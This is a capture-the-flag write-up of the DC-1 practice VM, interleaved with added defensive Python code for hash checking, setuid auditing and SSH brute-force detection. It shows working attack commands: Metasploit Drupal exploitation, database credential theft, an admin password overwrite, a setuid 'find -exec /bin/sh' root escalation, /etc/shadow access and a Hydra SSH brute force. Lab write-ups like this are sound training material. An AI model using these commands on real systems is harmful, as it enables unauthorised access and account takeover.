
DC-1

Posted: 2022-12-06 13:24:02


Tools: Wappalyzer, exploit-db.com, msf, python -c 'import pty;pty.spawn("/bin/bash")'

Host discovery:

nmap -sP 192.168.88.0/24 

Port scan:

nmap -p- 192.168.88.136   (shows that port 80 is open)

The Wappalyzer browser extension identifies the CMS as Drupal.

Searching exploit-db (bundled with Kali, https://www.exploit-db.com/) turns up a module that can be used to test for the vulnerability: Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)

The attack with msf succeeds and yields flag1. For a fully interactive shell, use the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

flag1:Every good CMS needs a config file - and so do you.


Using the configuration file, changing the password

Following the config-file hint, a Baidu search shows that Drupal's default configuration file is /sites/default/settings.php

flag2:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

So the database account and password can be read straight out of the configuration file:

  'database' => 'drupaldb',
  'username' => 'dbuser',
  'password' => 'R0ck3t',
  'host' => 'localhost',
  'port' => '',
  'driver' => 'mysql',
  'prefix' => '',

Logging in to the database reveals the admin login account and its password; the password is stored hashed:

admin | $S$DifAHlulp74nq/0qgqyEZC3myrg2.BKIhElw6/N/dRHCXN/aHTnu

The approach is to replace the password and then log in directly: hash 12345 with Drupal's own /var/www/scripts/password-hash.sh

www-data@DC-1:/var/www/scripts$ php password-hash.sh 12345 
php password-hash.sh 12345

password: 12345                 hash: $S$DYcuHU5yVhSkEP9Yuya/ODVNJkO4DpbPtvMKqUGM8Zps7DsgPhne

Update the password in the database (Drupal keeps accounts in the users table):

update users set pass="$S$DYcuHU5yVhSkEP9Yuya/ODVNJkO4DpbPtvMKqUGM8Zps7DsgPhne" where name="admin";

Logging in to the admin backend gives flag3: Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
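The $S$ hash above is Drupal 7's phpass-style scheme: the prefix "$S$", one cost character, an 8-character salt, then a truncated custom-base64 encoding of a SHA-512 digest that is iterated 2^cost times. The block below is an added example, not code from the post or from Drupal itself: a Python re-implementation of the verification routine (function and constant names are my own, modelled on the logic of Drupal 7's includes/password.inc). It is what a defender uses to confirm that a stored hash really corresponds to a given password, and to read off how much work each guess costs.

```python
import hashlib
import hmac
import math
from typing import Optional

# Alphabet of Drupal 7's phpass-style base64 (same order as includes/password.inc)
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55        # stored hashes are cut to 55 characters
DRUPAL_MIN_HASH_COUNT = 7      # accepted range of the cost exponent
DRUPAL_MAX_HASH_COUNT = 30


def _password_base64_encode(data: bytes) -> str:
    """phpass base64: 3 bytes -> 4 chars, little-endian 6-bit groups, no padding."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> Optional[str]:
    """Re-derive a $S$ hash from a password and the first 12 characters of a
    stored hash ('$S$' + cost character + 8-char salt). None on a bad setting."""
    setting = setting[:12]
    if len(setting) != 12 or setting[:3] != "$S$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        return None
    salt = setting[4:12].encode("latin-1")
    pw = password.encode("utf-8")
    # sha512(salt + pw), then 2**count_log2 further rounds of sha512(prev + pw)
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    output = setting + _password_base64_encode(digest)
    if len(output) != 12 + math.ceil(8 * len(digest) / 6):
        return None
    return output[:DRUPAL_HASH_LENGTH]


def drupal7_check_password(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate password against a stored $S$ hash."""
    candidate = drupal7_hash(password, stored)
    return candidate is not None and hmac.compare_digest(candidate, stored)


def drupal7_rounds(stored: str) -> int:
    """Number of SHA-512 rounds encoded in the hash's cost character."""
    return 1 << ITOA64.find(stored[3])


if __name__ == "__main__":
    # Hash from the post: the password-hash.sh output for 12345
    h = "$S$DYcuHU5yVhSkEP9Yuya/ODVNJkO4DpbPtvMKqUGM8Zps7DsgPhne"
    print(drupal7_rounds(h), drupal7_check_password("12345", h))
```

The cost character "D" is index 15 in the alphabet, so each guess costs 32768 SHA-512 rounds plus one; that is what separates a guessable hash from a quick lookup, and why a leaked hash is still worth treating as a credential leak when the password is as weak as 12345.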


Using /etc/shadow, privilege escalation via find

Reading /etc/shadow (which holds the users and their password hashes) is denied:

www-data@DC-1:/$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

Privilege escalation: find -name <filename> -exec /bin/sh \;  (this works because the find binary has the setuid bit set, which is what flag3's hint about special PERMS points at)

www-data@DC-1:/var/www$ whoami
whoami
www-data
www-data@DC-1:/var/www$ find -name flag1.txt -exec /bin/sh \;
find -name flag1.txt -exec /bin/sh \;
# whoami
whoami
root

flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::
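The root shell above exists only because find carries the setuid bit and is owned by root. The defender's counterpart to that step is a periodic audit of setuid-root files against a known-good baseline, so that an unexpected entry such as /usr/bin/find stands out. The block below is an added Python example, not part of the post: audit_suid, is_suid_root, collect_suid, the allow-list BASELINE_SUID and the SAMPLE_ENTRIES list are all constructed for illustration, and the sample mirrors the DC-1 misconfiguration.

```python
import os
import stat
from typing import Iterable, List, Tuple

Entry = Tuple[str, int, int]   # (path, st_mode, st_uid)

# Constructed allow-list of setuid-root files a stock Debian host legitimately needs.
# A real baseline is taken from a known-good image of the same build, not typed in.
BASELINE_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp",
}


def is_suid_root(mode: int, uid: int) -> bool:
    """True for a regular file with the setuid bit set and owned by uid 0."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0


def audit_suid(entries: Iterable[Entry], baseline=BASELINE_SUID) -> List[str]:
    """Return setuid-root paths that are not in the baseline, e.g. a setuid find."""
    return sorted(path for path, mode, uid in entries
                  if is_suid_root(mode, uid) and path not in baseline)


def collect_suid(root: str = "/") -> List[Entry]:
    """Walk the filesystem (lstat, so symlinks are not followed) and gather
    (path, mode, uid) for every regular file; pseudo-filesystems are skipped."""
    found: List[Entry] = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(("/proc", "/sys", "/dev", "/run")):
            dirnames[:] = []           # do not descend into these trees
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode):
                found.append((path, st.st_mode, st.st_uid))
    return found


# Constructed sample modelled on DC-1: find is root-owned and carries the setuid bit
SAMPLE_ENTRIES: List[Entry] = [
    ("/usr/bin/passwd", 0o104755, 0),           # expected, in the baseline
    ("/usr/bin/find", 0o104755, 0),             # the misconfiguration behind flag3
    ("/bin/ls", 0o100755, 0),                   # ordinary root-owned binary
    ("/usr/local/bin/report", 0o104755, 1000),  # setuid but not root-owned: not flagged here
]

if __name__ == "__main__":
    print(audit_suid(SAMPLE_ENTRIES))           # constructed sample
    # print(audit_suid(collect_suid()))         # run against the real host instead
```

On a live host, pair the audit with a mount option such as nosuid on filesystems that never need setuid binaries, and fix a finding by clearing the bit (chmod u-s) rather than by adding the file to the baseline.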


~, hydra and the SSH service

Method 1: from the root shell, go straight into the home directory and read flag4

# cd ~flag4
cd ~flag4
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

Method 2: brute-force flag4's password with hydra; port 22 was found open earlier

Kali's bundled wordlist, at /usr/share/wordlists/rockyou.txt.gz
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.88.136
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-05 07:14:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.88.136:22/
[22][ssh] host: 192.168.88.136 login: flag4 password: orange
[STATUS] attack finished for 192.168.88.136 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-05 07:16:05
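A run like the Hydra session above (16 parallel tasks, many attempts per second against one account) leaves a dense trail of "Failed password" lines in sshd's auth log, ending with an "Accepted password" from the same source. The block below is an added Python example, not from the post: a detector over constructed auth.log lines that alerts when one source IP exceeds a failure threshold inside a sliding window, and again when a login from that source is accepted while the burst is still inside the window. The names parse_line, detect_bruteforce and SAMPLE_LOG and the log lines themselves are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Matches OpenSSH password/publickey outcomes in a syslog-style auth.log line
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)

Event = Tuple[datetime, str, str, str]   # (time, result, user, ip)


def parse_line(line: str, year: int = 2022) -> Optional[Event]:
    """Parse one auth.log line; syslog omits the year, so the caller supplies it."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m['ts'].split())}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold: int = 10,
                      window: timedelta = timedelta(minutes=5)) -> List[Dict[str, object]]:
    """Alert once when a source IP accumulates `threshold` failures inside `window`,
    and again if that source is then accepted while the burst is still in the window."""
    events = sorted(e for e in map(parse_line, lines) if e is not None)
    recent_failures: Dict[str, List[datetime]] = defaultdict(list)
    alerted = set()
    alerts: List[Dict[str, object]] = []
    for ts, result, user, ip in events:
        # drop failures that have fallen out of the sliding window
        recent_failures[ip] = [t for t in recent_failures[ip] if ts - t <= window]
        if result == "Failed":
            recent_failures[ip].append(ts)
            if len(recent_failures[ip]) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append({"ip": ip, "kind": "bruteforce",
                               "failures": len(recent_failures[ip]), "at": ts})
        elif len(recent_failures[ip]) >= threshold:
            alerts.append({"ip": ip, "kind": "success_after_bruteforce",
                           "user": user, "at": ts})
    return alerts


# Constructed auth.log excerpt: one stray failure and a key login from .50, then a
# 12-attempt burst from .100 followed by an accepted password, as in the post's Hydra run
SAMPLE_LOG = [
    "Dec  5 07:10:01 DC-1 sshd[1100]: Failed password for root from 192.168.88.50 port 50120 ssh2",
    "Dec  5 07:10:09 DC-1 sshd[1102]: Accepted publickey for admin from 192.168.88.50 port 50121 ssh2",
] + [
    f"Dec  5 07:15:{sec:02d} DC-1 sshd[{1200 + sec}]: Failed password for flag4 "
    f"from 192.168.88.100 port {40100 + sec} ssh2"
    for sec in range(0, 48, 4)
] + [
    "Dec  5 07:16:05 DC-1 sshd[1320]: Accepted password for flag4 from 192.168.88.100 port 40218 ssh2",
]

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second alert kind is the one worth paging on: a success preceded by a burst of failures from the same source is the signature of a guessed password, not of a user mistyping. The lasting fix on a host like this one is to disable password authentication for SSH and allow only keys, with a rate limiter such as fail2ban as a backstop.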

Connect to the SSH service

ssh flag4@192.168.88.136
The authenticity of host '192.168.88.136 (192.168.88.136)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.136' (ECDSA) to the list of known hosts.
flag4@192.168.88.136's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy. Or maybe it is?

flag4@DC-1:/$ ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc selinux usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
flag4@DC-1:/$ cd ./root
-bash: cd: ./root: Permission denied

Root privileges are needed for the final result (escalate with find again, as above):

# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7


From: https://www.cnblogs.com/nagoya/p/16954948.html
